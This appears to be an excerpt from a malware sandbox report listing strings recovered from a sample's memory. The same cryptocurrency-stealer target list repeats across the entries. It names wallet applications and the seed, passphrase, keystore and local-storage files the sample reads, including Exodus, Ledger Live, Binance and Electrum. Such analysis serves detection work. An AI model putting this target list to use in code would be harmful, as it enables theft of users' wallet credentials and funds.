Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.0000000000914000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
Source: tAa6xNsucX.exe, 00000000.00000002.2304071459.000000000080C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 81.77\Users\user\AppData\Roaming\Binance\simple-storage.jsonNcs
